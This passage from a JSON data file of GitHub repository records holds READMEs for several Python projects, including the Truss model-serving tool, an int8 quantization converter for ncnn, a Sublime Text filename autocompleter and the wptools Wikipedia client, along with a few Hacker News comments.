Jupyter notebook](docs/notebooks/sklearn_example.ipynb).\n\n### Quickstart: making a Truss\n\n```python\n!pip install --upgrade scikit-learn truss\n\nimport truss\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import load_iris\n\n# Load the iris data set\niris = load_iris()\ndata_x = iris['data']\ndata_y = iris['target']\n\n# Train the model\nrfc = RandomForestClassifier()\nrfc.fit(data_x, data_y)\n\n# Create the Truss (serializing & packaging model)\ntr = truss.create(rfc, target_directory=\"iris_rfc_truss\")\n\n# Serve a prediction from the model\ntr.predict({\"inputs\": [[0, 0, 0, 0]]})\n```\n\n### Package your model\n\nThe `truss.create()` command can be used with any supported framework:\n\n* [Hugging Face](https://truss.baseten.co/create/huggingface)\n* [LightGBM](https://truss.baseten.co/create/lightgbm)\n* [PyTorch](https://truss.baseten.co/create/pytorch)\n* [scikit-learn](https://truss.baseten.co/create/sklearn)\n* [Tensorflow](https://truss.baseten.co/create/tensorflow)\n* [XGBoost](https://truss.baseten.co/create/xgboost)\n\nBut in more complex cases, you can build a Truss manually for any model. Start with `truss init my_truss` and follow [this guide](https://truss.baseten.co/create/manual).\n\n### Serve your model locally\n\nServing your model with Truss, on Docker, lets you interface with your model via HTTP requests. Start your model server with:\n\n```\ntruss run-image iris_rfc_truss\n```\n\nThen, as long as the container is running, you can invoke the model as an API as follows:\n\n```\ncurl -X POST http://127.0.0.1:8080/v1/models/model:predict -d '{\"inputs\": [[0, 0, 0, 0]]}'\n```\n\n### Configure your model for deployment\n\nTruss is configurable to its core. Every Truss must include a file `config.yaml` in its root directory, which is automatically generated when the Truss is created. However, configuration is optional. Every configurable value has a sensible default, and a completely empty config file is valid.\n\nThe Truss we generated above in the quickstart sample has a good example of a typical Truss config:\n\n```yaml\nmodel_framework: sklearn\nmodel_metadata:\n model_binary_dir: model\n supports_predict_proba: true\npython_version: py39\nrequirements:\n- scikit-learn==1.0.2\n- threadpoolctl==3.0.0\n- joblib==1.1.0\n- numpy==1.20.3\n- scipy==1.7.3\n```\n\nFollow the [configuration guide](https://truss.baseten.co/develop/configuration) and use the complete reference of configurable properties to make your Truss perform exactly as you wish.\n\n### Deploy your model\n\nYou can deploy a Truss anywhere that can run a Docker image, as well as purpose-built platforms like [Baseten](https://baseten.co).\n\nFollow step-by-step deployment guides for the following platforms:\n\n* [AWS ECS](https://truss.baseten.co/deploy/aws)\n* [Baseten](https://truss.baseten.co/deploy/baseten)\n* [GCP Cloud Run](https://truss.baseten.co/deploy/gcp)\n\n## Contributing\n\nWe hope this vision excites you, and we gratefully welcome contributions in accordance with our [contributors' guide](CONTRIBUTING.md) and [code of conduct](CODE_OF_CONDUCT.md).\n\nTruss was first developed at [Baseten](https://baseten.co) by maintainers Phil Howes, Pankaj Gupta, and Alex Gillmor.\n\n## GitHub Codespace\n\nIf your organization allows to access to GitHub Codespaces, you can launch a Codespace for truss development. If you are a GPU Codespace, make sure to use the `.devcontainer/gpu/devcontainer.json` configuration to have access to a GPU and be able to use it in Docker with truss.\n", "readme_type": "markdown", "hn_comments": "Looks interesting, what if I need to write some logic (pre/post prediction) in the prediction server?This is likely to share its name with the next Prime Minister of the UK...In this category I\u2019m a big fan of https://github.com/bentoml/BentoMLWhat I like about it is their idiomatic developer experience. It reminds me of other Pythonic frameworks like Flask and Django in a good way.I have no affiliation with them whatsoever, just an admirer.Looks great! What is the argument to use this over MLFlow model packaging and serving?Superb product and team.Worth looking into if you\u2019ve done any engineering work around deploying ML models as a or within a service.This looks promising. It feels like for non ML engineers it\u2019s very hard to figure out how to use models as part of vanilla CRUD codebase.For instance in a Rails app the ML model services would probably be served as a completely external service API generated with something like Truss wrapped in a service class that just exposes the outputs and handles errors/input validation!", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vsbuffalo/bds-files", "link": "https://github.com/vsbuffalo/bds-files", "tags": [], "stars": 511, "description": "Supplementary files for my book, \"Bioinformatics Data Skills\"", "lang": "Python", "repo_lang": "", "readme": "# The Supplementary Material Repository for Bioinformatics Data Skills\n\nThis repository contains the supplementary files used in my book,\n[Bioinformatics Data Skills](http://shop.oreilly.com/product/0636920030157.do),\npublished by O'Reilly Media. In addition to the supplementary files needed for\nexamples in the book, this repository contains:\n\n - Documentation on how all supplementary files were produced or how they were\n acquired.\n\n - Additional information readers may find interesting for each chapter. These\n are the `README.md` files in each chapter's directory. I've also included\n other resources like lists of recommended books for further learning.\n\n - Errata, and any necessary updates if materials become outdated for some\n reason.\n\nAlthough I've made an strong, strong effort to focus on the subset of\nbioinformatics tools that will not go out of date is this rapidly changing\nfield, if certain tools do become obsolete I will use this repository to host\nand describe alternatives.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "BUG1989/caffe-int8-convert-tools", "link": "https://github.com/BUG1989/caffe-int8-convert-tools", "tags": ["quantized-neural-networks", "ncnn", "int8-inference", "caffe", "deeplearning-ai"], "stars": 511, "description": "Generate a quantization parameter file for ncnn framework int8 inference", "lang": "Python", "repo_lang": "", "readme": "# Caffe-Int8-Convert-Tools\n\nThis convert tools is base on TensorRT 2.0 Int8 calibration tools, which use the KL algorithm to find the suitable threshold to quantize the activions from Float32 to Int8(-127 - 127).\n\nWe provide the Classification(SqueezeNet_v1.1) and Detection(MobileNet_v1 SSD 300) demo based on [ncnn](https://github.com/Tencent/ncnn)(a high-performance neural network inference framework optimized for the mobile platform) and the community ready to support this implementation.\n\n[The pull request in ncnn](https://github.com/Tencent/ncnn/pull/749)\n\n## NCNN have a new convert tool to support Post-Training-Quantization \n\nUsing this new [ncnn-quantization-tools](https://github.com/Tencent/ncnn/tree/master/tools/quantize), you can convert your ncnn model to ncnn int8 model directly. If you just want to deploy your model with ncnn,I suggest you use it.\n\n## Reference\n\nFor details, please read the following PDF:\n\n[8-bit Inference with TensorRT](http://on-demand.gputechconf.com/gtc/2017/presentation/s7310-8-bit-inference-with-tensorrt.pdf) \n\nMXNet quantization implementation:\n\n[Quantization module for generating quantized (INT8) models from FP32 models](https://github.com/apache/incubator-mxnet/blob/master/python/mxnet/contrib/quantization.py)\n\nAn introduction to the principles of a Chinese blog written by my friend([bruce.zhang](https://github.com/bigbigzxl)):\n\n[The implement of Int8 quantize base on TensorRT](https://zhuanlan.zhihu.com/zhangxiaolongOptimization)\n\n## HowTo\n\nThe purpose of this tool(caffe-int8-convert-tool-dev.py) is to test new features, such as mulit-channels quantization depend on group num.\n\nThis format is already supported in the [ncnn](https://github.com/Tencent/ncnn) latest version. I will do my best to transform some common network models into [classification-dev](https://github.com/BUG1989/caffe-int8-convert-tools/tree/master/classification-dev)\n\n```\npython caffe-int8-convert-tool-dev-weight.py -h\nusage: caffe-int8-convert-tool-dev-weight.py [-h] [--proto PROTO] [--model MODEL]\n [--mean MEAN MEAN MEAN] [--norm NORM]\n [--images IMAGES] [--output OUTPUT]\n [--group GROUP] [--gpu GPU]\n\nfind the pretrained caffemodel int8 quantize scale value\n\noptional arguments:\n -h, --help show this help message and exit\n --proto PROTO path to deploy prototxt.\n --model MODEL path to pretrained caffemodel\n --mean MEAN value of mean\n --norm NORM value of normalize(scale value or std value)\n --images IMAGES path to calibration images\n --output OUTPUT path to output calibration table file\n --group GROUP enable the group scale(0:disable,1:enable,default:1)\n --gpu GPU use gpu to forward(0:disable,1:enable,default:0)\npython caffe-int8-convert-tool-dev-weight.py --proto=test/models/mobilenet_v1.prototxt --model=test/models/mobilenet_v1.caffemodel --mean 103.94 116.78 123.68 --norm=0.017 --images=test/images/ output=mobilenet_v1.table --group=1 --gpu=1\n```\n\n### How to use the output file(calibration-dev.table)\n\nFor\u00a0example in *MobileNet_v1_dev.table*\n\n```\nconv1_param_0 0.0 3779.48337933 482.140562772 1696.53814502\nconv2_1/dw_param_0 0 72.129143 149.919382 // the convdw layer's weight scale every group is 0.0 72.129 149.919 ......\n......\nconv1 49.466518\nconv2_1/dw 123.720796 // the convdw layer's bottom blobchannel scale is 123.720\n......\n```\n\nThree steps to implement the *conv1* layer int8 convolution:\n\n1. Quantize the bottom_blob and weight:\n\n ```\n bottom_blob_int8 = bottom_blob_float32 * data_scale(49.466518)\n weight_int8 = weight_float32 * weight_scale(156.639840)\n ```\n\n2. Convolution_Int8:\n\n ```\n top_blob_int32 = bottom_blob_int8 * weight_int8\n ```\n\n3. Dequantize the TopBlob_Int32 and add the bias:\n\n ```\n top_blob_float32 = top_blob_int32 / [data_scale(49.466518) * weight_scale(156.639840)] + bias_float32\n ```\n\n## How to use with ncnn\n\n[quantized int8 inference](https://github.com/Tencent/ncnn/wiki/quantized-int8-inference#caffe-int8-convert-tools)\n\n## Accuracy and Performance\n\n#### We use ImageNet2012 Dataset to complete some classification test.\n\n| Type | Detail |\n| ------------------- | ----------------------------------------------------- |\n| Calibration Dataset | ILSVRC2012_img_test\u00a0 \u00a01k |\n| Test Dataset | ILSVRC2012_img_val\u00a0 \u00a0 5k |\n| Framework | ncnn |\n| Support Layer | Convolution,ConvolutionDepthwise,ReLU |\n\nThe following table show the Top1 and Top5 different between Float32 and Int8 inference.\n\n| Models | FP32 | | INT8 | | Loss | |\n| --------------- | ------ | ------ | ------ | ------ | --------- | --------- |\n| | Top1 | Top5 | Top1 | Top5 | Diff Top1 | Diff Top5 |\n| SqueezeNet v1.1 | 57.78% | 79.88% | 57.82% | 79.84% | +0.04% | -0.04% |\n| MobileNet v1 | 67.26% | 87.92% | 66.74% | 87.43% | -0.52% | -0.49% |\n| GoogleNet | 68.50% | 88.84% | 68.62% | 88.68% | +0.12% | -0.16% |\n| ResNet18 | 65.49% | 86.56% | 65.30% | 86.52% | -0.19% | -0.04% |\n| ResNet50 | 71.80% | 89.90% | 71.76% | 90.06% | -0.04% | +0.16% |\n\n#### We use VOC0712,MSCOCO Dataset to complete some detection test.\n\n| Type | Detail |\n| ------------ | -------------- |\n| Test Dataset | VOC2007 |\n| Unit | mAP (Class 20) |\n\n| Models | FP32 | INT8 | Loss |\n| ---------------- | ----- | ----- | ------ |\n| SqueezeNet SSD | 61.80 | 61.27 | -0.53 |\n| MobileNet_v1 SSD | 70.49 | 68.92 | -1.57 |\n\n#### Speed up\n\nThe following table show the speedup between Float32 and Int8 inference. It should be noted that the winograd algorithm is enable in the Float32 and Int8 inference. The Hardware Platform is Hisi3519(Cortex-A17@880MHz)\n\n| Uint(ms) | SqueezeNet v1.1 | MobileNet v1 | GoogleNet | ResNet18 | MobileNetv1 SSD | SqueezeNet SSD |\n| -------- | --------------- | ------------ | --------- | -------- | --------------- | -------------- |\n| Float32 | 282 | 490 | 1107 | 985 | 970 | 610 |\n| Int8 | 192 | 369 | 696 | 531 | 605 | 498 |\n| Ratio | x1.46 | x1.33 | x1.59 | x1.85 | x1.60 | x1.22 |\n\n#### Memory reduce\n\nRuntime Memory : mbytes\n\n| Models | fp32-wino63 | int8-wino23 | int8-wino43 |\n| ----------------- | ----------- | ----------- | ----------- |\n| squeezenet_v1_1 | 50 | 30 | 32 |\n| mobilenet_v1 | 61 | 35 | 35 |\n| mobilenet_v1_ssd | 90 | 45 | 45 |\n| squeezenet_v1_ssd | 210 | 70 | 94 |\n| resnet18 | 335 | 77 | 130 |\n| googlenet_v1 | 154 | 72 | 89 |\n\nStorage Memory : mbytes\n\n| Models | fp32 | int8 |\n| ----------------- | ---- | ---- |\n| squeezenet_v1_1 | 4.71 | 1.20 |\n| mobilenet_v1 | 16.3 | 4.31 |\n| mobilenet_v1_ssd | 22.0 | 5.60 |\n| squeezenet_v1_ssd | 21.1 | 5.37 |\n| resnet18 | 44.6 | 11.2 |\n| googlenet_v1 | 26.6 | 6.72 |\n\n## Contributor\n\nThanks to NVIDIA for providing the principle of correlation entropy and ncnn's author [nihui](https://github.com/nihui) sharing his neural network inference framework.\n\nThanks to the help from the following friends:\n\nOptimization Instructor : [Fugangping](https://github.com/fu1899), [bruce.zhang](https://github.com/bigbigzxl)\n\nAlgorithm : [xupengfeixupf](https://github.com/xupengfeixupf), [JansonZhu](https://github.com/JansonZhu), [wangxinwei](https://github.com/StarStyleSky), [lengmm](https://github.com/lengmm) \n\nPython : [daquexian](https://github.com/daquexian)\n\n## License\n\nBSD 3 Clause\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "liamcain/AutoFileName", "link": "https://github.com/liamcain/AutoFileName", "tags": [], "stars": 511, "description": "Sublime Text plugin that autocompletes filenames", "lang": "Python", "repo_lang": "", "readme": "AutoFileName: Autocomplete Filenames in Sublime Text\n=====================================================\nDo you ever find yourself sifting through folders in the sidebar trying to remember what you named that file? Can't remember if it was a jpg or a png? Maybe you just wish you could type filenames faster. *No more.*\n\nWhether your making a `img` tag in html, setting a background image in css, or linking a `.js` file to your html (or whatever else people use filename paths for these days...), you can now autocomplete the filename. Plus, it uses the built-in autocomplete, so no need to learn another *pesky* shortcut.\n\nUsage\n=====\nIf you are looking to autocomplete an image path in an HTML `` tag:\n```html\n \n```\n\nPressing ctrl+space, will activate AutoFileName. I list of available files where be ready to select.\n\n*Looking for an even more automatic and seemless completion?* Add the following to your User Settings file:\n \n \"auto_complete_triggers\":\n [\n {\n \"characters\": \"<\",\n \"selector\": \"text.html\"\n },\n {\n \"characters\": \"/\",\n \"selector\": \"string.quoted.double.html,string.quoted.single.html, source.css\"\n }\n ]\n\nWith this, there's no need to worry about pressing ctrl+space, autocompletion with appear upon pressing /.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "siznax/wptools", "link": "https://github.com/siznax/wptools", "tags": ["mediawiki", "mediawiki-api", "restbase", "wikidata", "open-data", "glam", "commons", "linked-open-data", "wikimedia-commons", "wikipedia", "wikipedia-api", "api-client", "python", "data-science"], "stars": 511, "description": "Wikipedia tools (for Humans): easily extract data from Wikipedia, Wikidata, and other MediaWikis", "lang": "Python", "repo_lang": "", "readme": "Wikipedia tools (for Humans)\n============================\n\n.. image:: https://img.shields.io/pypi/v/wptools.svg\n :target: https://pypi.python.org/pypi/wptools/\n\n.. image:: https://travis-ci.org/siznax/wptools.svg?branch=master\n :target: https://travis-ci.org/siznax/wptools\n\n.. image:: https://coveralls.io/repos/github/siznax/wptools/badge.svg?branch=master\n :target: https://coveralls.io/github/siznax/wptools\n\nPython and command-line MediaWiki access for Humans\n\n- get page extracts, image, Infobox data, Wikidata, and more\n- get a random page, category, or site\n- get page statistics\n- get category members\n- get site info and stats\n- get data in any language\n\nThis package is intended to make it as easy as possible to get data\nfrom MediaWiki instances, expose more Wikidata, and extend Wikimedia\nAPIs just for kicks. We say \"(for Humans)\" because that is a goal_.\nQuestions, feedback, and especially contributions_ are welcome!\n\n\nInstall\n-------\n\n.. code-block:: bash\n\n $ pip install wptools\n \u2728\ud83e\udd84\u2728\n\n\nExample\n-------\n\n.. code-block:: python\n\n >>> import wptools\n\n\nGet a page object:\n\n.. code-block:: python\n\n >>> page = wptools.page('Gandhi')\n\n\nGet `API:Query`_ data:\n\n.. _`API:Query`: https://www.mediawiki.org/wiki/API:Query\n\n.. code-block:: python\n\n >>> page.get_query()\n en.wikipedia.org (query) Gandhi\n en.wikipedia.org (imageinfo) File:Portrait Gandhi.jpg\n Mahatma Gandhi (en) data\n {\n aliases: M K Gandhi, Mohandas Gandhi, Bapu, Gandhi, M...\n assessments: Pakistan, Alternative Views, South Afric...\n description: pre-eminent leader of Indian nationalism ...\n extext: Mah\u0101tm\u0101 **Mohandas Karamchand Gandhi** ( ; H...\n extract:

Mah\u0101tm\u0101 Mohandas Karamchand Gandhi {u'size': 2951123, 'kind': 'query-pageimage', u...\n label: Mahatma Gandhi\n length: 262,790\n links: 10 Janpath, 14th Dalai Lama, 1915 Singapore M...\n modified: page\n pageid: 19379\n random: Salt\n redirected: {u'to': u'Mahatma Gandhi', u'from': u'Gandhi'}\n redirects: {u'ns': 0, u'pageid': 55342, u'title': u'M...\n requests: query, imageinfo\n title: Mahatma Gandhi\n url: https://en.wikipedia.org/wiki/Mahatma_Gandhi\n url_raw: https://en.wikipedia.org/wiki/Mahatma_Gandhi?action=raw\n watchers: 1,811\n wikibase: Q1001\n wikidata_url: https://www.wikidata.org/wiki/Q1001\n }\n\n\nGet `API:Parse`_ data:\n\n.. _`API:Parse`: https://www.mediawiki.org/wiki/API:Parse\n\n.. code-block:: python\n\n >>> page.get_parse()\n en.wikipedia.org (parse) Gandhi\n en.wikipedia.org (imageinfo) File:MKGandhi.jpg\n Mahatma Gandhi (en) data\n {\n image: {u'size': 2951123, 'kind': 'parse-image', u'des...\n infobox: known_for, other_names, image, signature, bi...\n iwlinks: https://biblio.wiki/wiki/Mohandas_K._Gandhi,...\n pageid: 19379\n parsetree: